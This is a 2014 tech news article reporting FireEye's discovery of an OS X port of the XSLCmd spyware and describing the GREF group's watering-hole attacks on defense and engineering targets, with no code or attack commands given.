The Channel logo


By | John Leyden 5th September 2014 23:43

New software ported from Windows to Mac! You'll never guess what. Yes, it's spyware

XSLCmd coming your way, whether you like it or not

Miscreants have ported five-year-old spyware XSLCmd to OS X.

The Windows version of the malware has been around since 2009, and the Apple Mac edition of XSLCmd shares significant portions of the same code. It can open a reverse shell to its masters, automatically transfer your documents to a remote system, install executables, and is configurable.

But the OS X port adds new features, according to net security firm FireEye, which claims to have discovered the backdoor-installing tool.

"The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing," FireEye said.

The infosec biz tracked the development of the software to a group it has named GREF due to the gang's habit of dropping references to Google in their nefarious activities.

GREF has targeted US defense contractors to electronics and engineering companies worldwide, as well as foundations and non-government organizations – especially those with interests in Asia.

The gang's favorite tactic involves setting up watering holes: essentially, hacking websites popular with workers in the aforementioned industries to inject a malicious JavaScript file into the sites' webpages.

The mechanism to pull in the code is tucked away inside blocks of Google Analytics code. Once executed, the JavaScript gets to work pulling in and installing XSLCmd.

FireEye explained that "true to their moniker the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did."

GREF have often used web server vulnerabilities to lay the groundwork for attacks.

"They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system," FireEye researchers James T. Bennett and Mike Scott wrote in their blog post.

Surveillance and remote-control tools targeted at Mac users are uncommon. However, security tools vendor AlienVault documented an Office for Mac attack targeting Tibetan non-government organizations two years ago.

And the so-called IceFrog group hit South military and media outlets in Korea and Japan last year after developing backdoor-installing malware that worked on Mac and Windows machines, as discovered by Russian security firm Kaspersky Lab. ®

comment icon Read 30 comments on this article or post a comment alert Send corrections


Frank Jennings

What do you do? Use manual typwriters or live in a Scottish croft? Our man advises
A rusty petrol pump at an abandoned gas station. Pic by Silvia B. Jakiello via shutterstock

Trevor Pott

Among other things, Active Directory needs an overhaul
Baby looks taken aback/shocked/affronted. Photo by Shutterstock

Kat Hall

Plans for 2 million FTTP connections in next four years 'not enough'
Microsoft CEO Satya Nadella


Suit-and-tie-wearing man tries to meditate, take deep breaths in faux yoga pose. Photo by Shutterstock
Emotional intelligence, not tech skills, is the way to woo suits
League of gentlemen poster - Tubbs and Edward at the local shop. Copyright BBC
One reselling man tells his tale of woe